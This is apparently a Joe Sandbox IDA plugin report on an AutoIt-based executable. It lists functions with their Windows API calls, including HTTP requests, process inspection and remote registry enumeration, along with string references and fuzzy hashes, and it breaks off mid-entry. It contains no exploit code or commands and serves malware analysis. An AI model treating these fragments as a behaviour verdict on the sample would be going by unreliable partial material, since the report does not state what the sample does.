Part of subcall function 00A77562: VariantClear.OLEAUT32(00000000), ref: 00A775B7

Strings

AUTOIT.ERROR, xrefs: 00A88728
Incorrect Parameter format, xrefs: 00A8864B, 00A8880D

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 7be28a962659f4c057849078f495253a5ca530ed972fda42b399a530895ad2c9
Instruction ID: 0afcb79d8ebf189f7fb98c874b05d56cbbfdb4ad47b189ef5872c4d9a8194b21
Opcode Fuzzy Hash: 7be28a962659f4c057849078f495253a5ca530ed972fda42b399a530895ad2c9
Instruction Fuzzy Hash: 2A917A74A083019FCB10EF24C58495BBBF4EF89754F54892EF88A8B361DB35E945CB92

Function 00A72A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2FC86: _wcscpy.LIBCMT ref: 00A2FCA9

_memset.LIBCMT ref: 00A72B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A72BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A72C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A72C97

Strings

0, xrefs: 00A72B73

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 00778f696c0783356bd225f89d56c6777eb9c4ed0508440cd2de482b4d606235
Instruction ID: e150288f5f07de9e1b36cf680eb8f566b023e75cfc9fc982405a1f726cb211e3
Opcode Fuzzy Hash: 00778f696c0783356bd225f89d56c6777eb9c4ed0508440cd2de482b4d606235
Instruction Fuzzy Hash: 5551CC716083019ED7269F28DC45B6FB7E8EBA8350F14CA2EF899D2291DB70CD449752

Function 00A6D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A6D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A6D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A6D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A6D69D

Strings

DllGetClassObject, xrefs: 00A6D610

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 1b18fa13f58d21f1d45fcd395e1b24cfa6c65ab241a13e639be9bf81e28799be
Instruction ID: 78415c50db04c51aa440981c0f4afc4d0f6695b4e691c8f7812cc4164e72a65a
Opcode Fuzzy Hash: 1b18fa13f58d21f1d45fcd395e1b24cfa6c65ab241a13e639be9bf81e28799be
Instruction Fuzzy Hash: 2E418EB5B10204EFDB05CF64C884B9A7BB9EF44350F1581AAED09DF205D7B1D940DBA0

Function 00A72753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A727C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A727DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00A72822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AD5890,00000000), ref: 00A7286B

Strings

0, xrefs: 00A727B5

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: e821ae8bb46e7d48c40d626640eea7a23e4467e733bd83192d2aaf0d447d6bc6
Instruction ID: 63ad49830e2acc6652980732db1768e6d5f8ba1d8459f9ce85fd8dad3cad6dc1
Opcode Fuzzy Hash: e821ae8bb46e7d48c40d626640eea7a23e4467e733bd83192d2aaf0d447d6bc6
Instruction Fuzzy Hash: 3C418E702043419FD724DF25DC44B5ABBE8EF85314F14C92EF9A997292DB31A905CB53

Function 00A8D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A8D7C5

Part of subcall function 00A1784B: _memmove.LIBCMT ref: 00A17899

Strings

cdecl, xrefs: 00A8D81C
none, xrefs: 00A8D8A0
stdcall, xrefs: 00A8D847
winapi, xrefs: 00A8D836

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: b266d864c45f98554325a00a2e1f8ef1b46b679faac72f7cf7ee66614e64e7d7
Instruction ID: c6c80e67054e9ccd758a2d4db6932cd8c6963e10cf356ad035b9759e235f561d
Opcode Fuzzy Hash: b266d864c45f98554325a00a2e1f8ef1b46b679faac72f7cf7ee66614e64e7d7
Instruction Fuzzy Hash: F931AD71904619AFCF00EF68C955DEEB3B4FF04320F108A29E825AB6D1DB31AD05CB80

Function 00A68E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A68F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A68F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00A68F57

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

Strings

ListBox, xrefs: 00A68ED3
ComboBox, xrefs: 00A68E9E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 09a17cd11b5689972d3bc0ee9fe1dfbf4d6007679e640894743a5d8b3fee6b6a
Instruction ID: b13d062304a12d3430982728f069f6d7a7a020f66399675a7550b9dfadc7bcd2
Opcode Fuzzy Hash: 09a17cd11b5689972d3bc0ee9fe1dfbf4d6007679e640894743a5d8b3fee6b6a
Instruction Fuzzy Hash: C1210171A04108BEDB14ABB0DC85DFFB7BDDF15360F10462AF421A71E0DF39484A9A10

Function 00A8182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A81872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A818A2
InternetCloseHandle.WININET(00000000), ref: 00A818E9

Part of subcall function 00A82483: GetLastError.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A82498
Part of subcall function 00A82483: SetEvent.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A824AD

Strings

, xrefs: 00A81893

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 474fc04eaee3521e1525548f358e06d89bb7c97f0d4f38ebc5025bc77890fa94
Instruction ID: 15f634da4b6098aa45c5adaae3f71a3e6550cb8458ed5f404c6898ba0888a70e
Opcode Fuzzy Hash: 474fc04eaee3521e1525548f358e06d89bb7c97f0d4f38ebc5025bc77890fa94
Instruction Fuzzy Hash: 852180B1600208BFEB11ABA4DC86EBB7BEDEB48744F10412AF405D7140EB609D0657B1

Function 00A963E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A96461
LoadLibraryW.KERNEL32(?), ref: 00A96468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A9647D
DestroyWindow.USER32(?), ref: 00A96485

Strings

SysAnimate32, xrefs: 00A9643C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 85e58f4a066b4ac2d674080a9cbfc5bee2290ce404be5bcfed443417cdb32074
Instruction ID: f92fc7a9fd717b8f9993bcdf8a5af899736d3003a2064744916744b5fff80d4e
Opcode Fuzzy Hash: 85e58f4a066b4ac2d674080a9cbfc5bee2290ce404be5bcfed443417cdb32074
Instruction Fuzzy Hash: 44215B71300205BFEF108FA4DD84EBB77E9EF99764F148629FA2096190D7719C919760

Function 00A76D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00A76DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A76DEF
GetStdHandle.KERNEL32(0000000C), ref: 00A76E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A76E3B

Strings

nul, xrefs: 00A76E36

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c57c43c315c2cd2ceb7094ea2825e887e86599be48a6c16a5b23b68ccb82b2c2
Instruction ID: 6aab6cc012ff306d73f9ec16726de30491b8fdb38febcfd406444201fef98ffa
Opcode Fuzzy Hash: c57c43c315c2cd2ceb7094ea2825e887e86599be48a6c16a5b23b68ccb82b2c2
Instruction Fuzzy Hash: D8218175600A09AFDB309F69DC04B9A7BF4EF44720F20CA1AFDA4D72D1DB7099518B64

Function 00A76E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00A76E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A76EBB
GetStdHandle.KERNEL32(000000F6), ref: 00A76ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A76F06

Strings

nul, xrefs: 00A76F01

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 147719ec1065874dc33e89da5f3e3eadb8dfc0a3c6e9b5ad2eb6382a71fe3802
Instruction ID: ed3f23fd0ad48945c4445d4d054fbd8902f6ed8ff2c925d264e8cf3546a82a5b
Opcode Fuzzy Hash: 147719ec1065874dc33e89da5f3e3eadb8dfc0a3c6e9b5ad2eb6382a71fe3802
Instruction Fuzzy Hash: 202190796007059BDB209F69DC04BAA77B8AF45720F20CA1AF9A8D72D0DB70A8518B61

Function 00A7AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A7AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A7ACA8
__swprintf.LIBCMT ref: 00A7ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00A9F910), ref: 00A7ACFF

Strings

%lu, xrefs: 00A7ACBB

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 000b05206a816782631600f5d9d3aaa56828f9d122d91c6d3ff1a76d9f373a40
Instruction ID: 63097592650d80ecfc19ec159617546f8457f0512bdac355574b14dd596c46c2
Opcode Fuzzy Hash: 000b05206a816782631600f5d9d3aaa56828f9d122d91c6d3ff1a76d9f373a40
Instruction Fuzzy Hash: 7A213035A00109BFCB10DFA5CE45DEE7BB8FF89714B108469F909DB252DA31EA45CB61

Function 00A71AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A71B19

Strings

KEYS, xrefs: 00A71B30
EXISTS, xrefs: 00A71B41
REMOVE, xrefs: 00A71B1F
APPEND, xrefs: 00A71B52

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 91a0ea55d3061b155e5f2b4585c5c7ba77baafb252af565324ff0d6e28ccffee
Instruction ID: ee7ec8dc931569d88ad4d6fd980b6fa304b63b9346fcd9fbb64ea191eb6e5892
Opcode Fuzzy Hash: 91a0ea55d3061b155e5f2b4585c5c7ba77baafb252af565324ff0d6e28ccffee
Instruction Fuzzy Hash: 88115B319002088FCF00EFA8D9619EEB7F4FF65704F5084A9E819A7292EB325D06CB54

Function 00A8EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A8EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A8EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A8ED6A
CloseHandle.KERNEL32(?), ref: 00A8EDEB

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: b37d28ae3f59895528110170cd25f3e0d26706a69d8e44be975a0072963f2471
Instruction ID: 8365a523d9592cc8df7ea5f146825a9f88debc123d3dbbd01baf40974c912e9c
Opcode Fuzzy Hash: b37d28ae3f59895528110170cd25f3e0d26706a69d8e44be975a0072963f2471
Instruction Fuzzy Hash: 43818F716043009FD720EF28C996F6BB7E5AF48710F14881DF999DB292DB74AC41CB91

Function 00A3541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A3547B
_memcpy_s.LIBCMT ref: 00A354ED
__read_nolock.LIBCMT ref: 00A3554B
__filbuf.LIBCMT ref: 00A3556E
_memset.LIBCMT ref: 00A355B2

Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 2257151759b53c8ce68a12d5ba3591060184354b31dd55c60a7d19a8292f0d8a
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: B451A270E00B05DBDB288FBDD98166EB7B7AF41321F248729F825962D0D771ED909B40

Function 00A90037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A900FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A9013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A90183
RegCloseKey.ADVAPI32(?,?), ref: 00A901AF
RegCloseKey.ADVAPI32(00000000), ref: 00A901BC

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
